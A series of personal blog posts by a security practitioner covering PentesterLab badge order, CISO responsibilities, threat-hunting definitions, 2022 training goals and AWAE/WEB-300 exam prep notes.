The platform is not entirely clear on what order to tackle the badges in. I’ll attempt to provide some guidance here, but generally speaking, tackle the ones that have the most completions first, and the ones with fewer completions later on.

I would suggest students or those with newer skill levels in the topics tackle these badges first: INTRODUCTION, ESSENTIAL, UNIX, RECON, HTTP, PCAP. These all really hone in on specific tasks and other foundational concepts that will be useful at all levels. And for those who know these topics, you may still learn something new or have an opportunity to solve them in different ways. For example, maybe parse the PCAP programmatically instead of in Wireshark. Or in the HTTP badge, script the solutions rather than use curl. The Essential badge is where you find your beginner types of web app topics.

From here, you can honestly go anywhere else, but continue on for general guidance.

The API badge could be something to tackle next. This badge isn’t totally released at the time of this writing, but the exercises are pretty basic to date and follow the ESSENTIAL badge topics pretty well.

Going down the rabbit hole of the other badges, here’s a good route to follow: WHITE, YELLOW, BLUE, SERIALIZE, GREEN, BROWN. Most of these progress naturally, though the BROWN badge sometimes feels like it has exercises that could be slotted into the other badges, but those badges were already complete when these new CVEs or attacks came out, and they just needed a place to land. Still, several BROWN exercises directly suggest solving some others scattered elsewhere first.

The INTERCEPT and ORANGE and AUTHENTICATION/AUTHORIZATION badges are more intense as far as requiring more work on the student to host things like a DNS server or a public endpoint to perform XSS or other reflection attacks. These definitely present a different set of challenges. The AUTHENTICATION/AUTHORIZATION badge is all about SAML and OAuth, but again it often requires you to host an endpoint that is part of the exploitation path.

The CODE REVIEW badge is a weird one in that you’re reading code and identifying the problems in that code. There are also tons of videos separate from the exercises. Some of these give a half-dozen lines making them kind of easy, while others are long sections of code across multiple files which increases the difficulty of finding the needle in the haystack, as it were. Since this badge is super long and not completed yet, I suggest tackling these in between other badges to keep things fresh. Also, I consider this badge super unique in that I’ve not really seen exercises elsewhere before that specifically target code reviewing skills.

The ANDROID and CAPTURE-THE-FLAG badges are sort of one-off badges students can do whenever. ANDROID is specific to Android applications, and I have no idea how difficult these really are. Java and Android are well outside my comfort zone, so I leaned heavily on the videos to progress through these. The CAPTURE-THE-FLAG badge contains some common CTF-like challenges that involve web or crypto-related topics. They’re fine, but definitely not common fare for web app pen testers.

To date, I have done none of the JAVA SERIALIZE or MEDIA badges, so I can’t comment on those.

Overall, my time on this platform has been good and I’ve learned a ton and gained lots of confidence when it comes to understanding and even walking through various web exploits and weaknesses. I’m no developer, but I think I can hold my own discussing security topics on a practical level like one, though.

ciso responsibilities

(Pet peeve: Articles that don’t have dates on them. Don’t be that type of site. Ok, I know the article I link to is dated in 2021 [if you turn on javascript], but the note that I made to myself referencing this article was made in 2019…)

A post over on CSOOnline, “How the CISO role is evolving,” goes over some interesting discussion points about the CISO role.

I initially targeted my notes on the list of skills for the CISO:

  • Security operations
  • Cyberrisk and cyber intelligence
  • Data loss and fraud prevention
  • Security architecture
  • Identity and access management
  • Program management
  • Investigations and forensics
  • Governance

Holy cow, is there anything in Infosec left untouched there? Then again, CISO is the top of that leadership pyramid, right? But, this illustrates to me how difficult the CISO’s job will be if they do not report into or next to the overall IT organization. Reporting outside of IT means lots of consulting and ultimately audit-like tasking that hopes all of the above items end up getting done (and likely won’t be). And I’ve yet to see IT auditing being even partially effective or useful.

Later in the article, it starts to get real about the most important job requirement for a CISO role not necessarily being the technical understanding. I think it’s true that at this level, a key skill is “advocating for security within the company leadership.”

I think leadership traits are also important, but that’s always a funny thing within any department, team, or organization. Particularly in a technical field. At least for me, technical credibility is a key trait of leaders I respect and react positively towards. Someone who does not understand the technical aspects and demonstrates this by being wrong on a regular basis just does not get respected by me and will not be a good leader for me. And it’s not like I need them to be highly technical; but I need them to be technical enough to know and be open about their limitations, and big enough to allow others to fill in the gaps. Leaders who get technical things wrong, don’t understand that they’re wrong, and thus never seek information from their team in order to make proper decisions, are what cause security to take steps backwards.

And it’s not just me, but many technical teams will stop listening to security if the people they interact with are regularly wrong, or vague, or confusing, or belligerent, or just not keeping up. Technical people who know the right answer don’t tolerate people who cling to wrong answers.

Another way to say this is the CISO needs to know enough to know their team is performing as needed, or if they need assistance.

establishing a cybersecurity program

I don’t recall where I found this graphic, but at least it has a citation on it. I liked it enough to keep it, and just wanted to move it out from my personal notes into here.

I do like these steps, though obviously there are plenty of ways to tackle this problem. And if someone needs, or needs to show, some sort of process/plan, this makes a good pragmatic start.

One thing I would change on this is to make sure this isn’t like a 1-year process right here. I feel like steps need to be taken pretty quickly to start *doing* something and getting some output and value. For example, Step 7 shouldn’t be waiting for earlier steps to develop. Step 7 should strive to start as soon as positive movement can be achieved. Early, easy wins, or foundational pieces.

I also prefer to think in terms of maturity levels based on some sort of model. I think that’s what is meant here by tiers. That is just a difference in preferred terminology.

threat hunting, a great definition from fidelis

Threat hunting is a cool term. It’s so cool that so many people, managers, and marketers have latched onto it and used it to describe almost anything you can think of, from pen testing to SOC operations to red teaming to incident response. It’s become a pet peeve of mine how badly “threat hunting” is misused and misunderstood.

And I’m still convinced that threat hunting started for two main reasons. First, to slip in between the major efforts already in play: detection engineering (the blue team SOC), incident response which tackles found things, and handling threat intelligence, which usually ends up being an automated feed and correlation mechanism within a SIEM. Another way to put it: the human in between the matured automated technical activities.

And second, something for bored internal red teamers, IR folks, and senior detection engineers to do in between the main projects. (I’m joking, but I’m not….but I am…)

I just skimmed through a free PDF that caused me to make this post to keep this link around and share it: Threat Hunting Essentials, Part 1: Threat Hunting Defined, by Fidelis Cybersecurity.

In this, they not only talk about a good definition of Threat Hunting, but also examples of what it is not. This is super important, because I’ve talked to way too many people from keyboard warriors in the trenches up to management and executive levels who have the wrong idea of what Threat Hunting is. And having it wrong almost certainly means the chances of a successful threat hunting team are limited, and they probably won’t be happy hunters if everyone is operating under slightly different missions. That is bad friction.

Fidelis gives this definition:

“Threat hunting is the proactive hypothesis driven discovery of artifacts, activity, or detection methods not accounted for in passive monitoring capabilities.”

And see, even trying to isolate a good definition like this will still be open to interpretation. It is best to read the entire paper, as they do an amazing job of framing the problem, tackling the problem with easily understood examples and language, and allowing it all to funnel down into something that I consider easy to handle. There are lots of good examples and discussions over recent years, but it’s been hard to find one so clear and yet (mostly) concise enough to present to others.

And yes, it can still be done by bored internal red teamers, senior detection engineers who need a break, or incident responders that don’t have any incidents being currently worked. But the inputs, outputs, methods, results, and expectations need to get aligned in order for the mission to add value and be successful.

And I’ll also just add that Threat Hunting is an advanced activity. It should only be a thing with maturing security operations and engineering teams, and only for those with senior skills in understanding offensive tactics, forensic artifacts left behind, and where the gaps in blue team visibility occur.

learning and training goals for 2022

This is my sixth year openly posting about my learning and training goals, though it feels like I skipped a year. Last year was not a productive year on the personal training front, so most of my items here are not really new. And I’m already about a half year late making a post like this, which means a few of these items might already be done or in flight.

So, what do I have in play this year? I sort of skewed things a bit towards the blue team side of things last year, and that’s still the plan this year. I pride myself on having deep knowledge of red, blue, and forensics skills and I possess a strong belief that each plays and improves upon the others, whether in a team situation or as a lone wolf.

Formal Training/Certifications

AWS Solutions Architect Associate certification renewal. I’ve done this once, so should be good to do again, but I’ll be consuming courses on Udemy and ACloudGuru in this pursuit. I truly thought about doing the Professional version of this, but I’d like more consistent hands-on AWS work before it.

AWS Security Specialty certification renewal. I’ve also done this once, and am not too worried about this one, but I do distinctly recall these questions were dense and tricky. As with SolArch, I’ll be using Udemy and ACloudGuru to prepare.

CISSP renewal. This is really about paying the fee, yet again. With all the other stuff I do, the CPE tanks are always full.

GIAC GCFA (FOR508) forensics certification renewal. This is also just paying the fee. But, I then need to carve some time out to go over the updated course materials and labs.

Antisyphon training courses. I’ve really liked the format of the BHIS/Antisyphon courses, and the cost as well. I plan to continue to take courses here as long as they have interesting topics offered. I’ve so far taken three, and while I’d just take them all if I could, here are some leading choices: Applied Purple Teaming (Ickler/Drysdale), Enterprise Attacker Emulation and C2 Implant Development (Thyer), Hacker Ops (May), and various others that tend to lean into Red Team stuff.

OffSec. A stretch goal. Since getting my OSCP some 5 years ago, I’ve wanted to get back and do some more of the advanced courses, labs, and subsequent certs that Offensive Security offers. I just haven’t done it yet. I likely won’t get to this in 2022, but I think in 2023 I want to look very hard at the annual subscription which opens up materials for all of OffSec’s certs.

Informal Training

BlueTeamLabs.online. BTLO is a sort of blue team themed lab and gamified ladder, much like HTB is for red team skills. The company behind this also offers courses for blue teamers, but I’m more interested in the labs to practice skills, learn new tools, and improve what I know through hands-on trial and error in a safe environment. This has exceeded my expectations so far, and I’ve even exceeded my own goals on the platform. I started out just wanting to learn some things and maybe make the top 100. Today, I’m trading off the global #1 spot with several others.

Practical Malware Analysis book and Reversing, debugging. Getting into and even successfully through the RE challenges on BTLO has whetted my appetite for continuing down this path some more. I’ve long dabbled very lightly in reversing, debugging, and disassembly, but never to a degree that makes me feel skilled at it. I’ve broken through some barriers while doing BTLO challenges, and I’m wanting to keep that ball rolling. I’d like to go through exercises in the Practical Malware Analysis and Malware Analysis Techniques books while also getting started in TryHackMe’s related areas. I also still have access to the Zero2Automated course set, but that seemed a bit beyond me when acquired a few years ago.

Microsoft Azure and M365 stuff. I namely want to just go through materials for AZ-900 & AZ-500, and then also MS-900 & MSSC-500 and other stuff in the SC-series. I don’t really plan to pursue any of the associated certifications, but I’m not entirely ruling it out, either. This is mostly to get more exposed and build foundations in Azure and M365 offerings as they become more and more ubiquitous in the enterprise. Very similar to picking up AWS skills a few years ago. Also plan to learn more about Azure Sentinel.

Splunk Learning. I use Splunk at work, and I’ve long put off the more formal courses. Splunk has recently re-organized their certification and learning offerings, and while I can’t say I think they’re good changes, I still want to plug through the material at some point. Much like MS stuff, I don’t necessarily plan to do the certifications. These courses are definitely only worth it if the business or Splunk credits pay for them. It’s otherwise better to just sign up for Boss of the SOC (BOTS) (free!) on a regular basis to gain some hands-on experience.

TryHackMe (THM). I’ve only briefly used this platform once, and just have not made the time or effort to get back here. I think now might be the time. I’ve almost fully completed BTLO, I don’t really want to go back to HTB yet, I’ve gotten up to where I want to be on PentesterLab. And THM is just a blank spot for me that I shouldn’t have let go so long.

PentesterLab. I still have a sub to this lab site, and while I’m mostly caught up on what I want, they still push out content enough to keep me coming back, particularly on the Code Review badge lately.

C2 & Attacker Emulation. Last year I took a course in using various C2 platforms, but didn’t feel like I got quite enough out of it on the first run. I’d like to wield my home lab a bit further and try more C2 platforms out and just gain more familiarity. If I achieve other things before the end of the year, this could be a nice break before 2023 activities.

Gentle Career Aspirations

I don’t normally do this, as I don’t want to suggest to potential employers that these are the only things I want to do, but it’s good to at least tell myself these things in case career opportunities land in my lap. But, in a way, doing these for work in the next few years would probably make me a happy employee (not that I’m not happy now, but it’d be exciting to look forward to and then learn and do):

  • pentesting, red teaming, purple teaming…even just testing new exploit POCs
  • C2 and attacker emulation to test and improve controls, both technical and response
  • web app testing and other application/development security
  • architect-level planning and design and advisement, configuration hardening
  • ever-increasing hands-on in AWS and Azure/M365

awae / web-300 unused prep notes

Shortly after earning my OSCP I wanted to someday continue that push through the Cracking the Perimeter/OSCE certification as well. I never got around to it, and then OffSec retired that course while releasing AWAE (now WEB-300)/OSWE (and EXP-301/OSED), which I immediately also wanted to do. Part of my prep for a major certification is to Google up all sorts of reviews and posts about the certification and what other study materials and tips and insights other students found useful. This includes blogs, reddit posts, forum posts, and anything else that I could find or dig through. As such, I did plenty of this as preparation for the AWAE (WEB-300). I still plan to pursue this someday, but for now I wanted to share what I had compiled into my personal notes.

Some of these things I may have gained knowledge of through other less formal means over the past few years or just outright completed without really planning it, but AWAE is still pretty new and all of these resources are likely still relevant.

That said, never let too much preparation get in the way of getting access to the course and the labs for practice. You don’t just get sent off straight into an exam, and can always put that part off for later if some gaps in knowledge continue to linger.

Lastly, it should go without saying to click links below at your own discretion. All are external to this site.

My Goals

  • level up my hands-on web app pentesting
  • code review skills looking at vulnerabilities
  • writing exploits for web app vulnerabilities
  • actionable python (requests, etc)
  • learn much more about .NET, C#, nodejs, php, and some more on java…enough to feel comfortable reading source code and tracing requests and parameters
  • more familiarity with Visual Studio Code, debuggers

I do like to write out goals, as they do a few things for me. First, the goals help make sure I’m aligning my certification path and the preparation towards it with what I hope to get out of it. Second, it helps give me an idea what the certification path is all about, so that I can slot other possible preparation topics into it. In other words, managing expectations and summarizing the output.

This is my initial seeding of research and prep

Preparation Checklist

This is my reviewing of the above items and setting up some semblance of a plan. Considering what this cert is, I definitely don’t see myself signing up for this until the latter half of 2021. Worst case scenario, I am not entirely prepared, but sign up for the course anyway and either put off or fail the exam. Either way, I still come out of that with some learning, and extra time (and less stress based on deadlines), and a good idea of my next steps.

General things I need to do:

  • learn what MVC and OOP really mean
  • Python, writing small scripts to deliver exploits, handle requests <– should be comfortable with this
  • C#/.NET
  • nodejs/Javascript
  • php
  • java
  • learn debugging and decompiling tools, dnspy, de-gui
  • regex
  • more SQL injection
  • do various vulnerable web apps
  • Visual Studio Code
  • SublimeText
  • brush up on various in-scope web app vulnerabilities types
  • comfortable debugging the above on Windows and Linux, or at least aware of techniques

Actual things to do

Tools

  • dnSpy – .NET decompiler
  • Python requests and exploit building
  • de-gui for java?
  • use Visual Studio Code regularly (many benefits; hotkeys and debugging, going to modules/references)
    • leverage Visual Studio Code SSH extensions
    • understand the launch.json files in Visual Studio Code
  • learn some SublimeText (for python)
  • Burp (set scope, intercept requests, manipulate requests…)

Languages / major themes / skills

General techniques to know about

Pre-course things to revisit before purchasing the course

  • read the footnotes and links, do the extra miles!!!
  • define a methodology: blackbox the app first, then white box source code (grep/ngrep?)
  • set up kali and note strategy
  • read offsec faqs and guidelines for course and exam

Lastly, make a list of things from the above to review halfway through the course, and another list to review before scheduling the exam.

Balancing Private Notes and Public Notes in 2022

Back in the early 2000s I often used my blog to hold notes, links, and things I’d consumed or done or would check deeper into or read or do. Over the years, this activity sort of moved away from being in a blog, and more to my own private notes, or into Pocket (never to be seen again!). I feel like some of this is the result of the growing avalanche of information at our fingertips from 2000 until now.

I’ve gotten to the point where I kinda want some of that stuff cycled out of my private notes, but not always entirely lost. Something I could possibly still search and re-reference, without maintaining my own mini-encyclopedia of topical notes and links and to-do lists. Honestly, sort of the same itch that a diary or journal serves for thoughts and experiences…or other blogs and feeds. And the same sort of thing that will just go away when I do as the domain/hosting expires. (See, that’s the good part of hosted blogs, like blogspot and blogger, right? They’ll stay around?)

So, maybe I should start to empty out a bunch of my private notes into my blog here! I mean, on the other hand, why not? And while not private, it’s not like a bunch of folks will read most anything I put in here. 🙂 I feel like the days of personal blog-popularity are long gone anyway.

I used to also have a personal wiki I hosted, but never really did too much with, that I could resurrect for some things. Or just move that sort of usage over to Github Wiki.

I don’t think I’ll ever use a blog as a “to-do” list, as that is way too suited to a notes app. But, I can at least have a way to trim things off without feeling like I’m forever losing a resource or reference. Thereby maybe regaining control of my “to-do” list! Let some things go, ya know?

Anyway, I’ll see how this goes.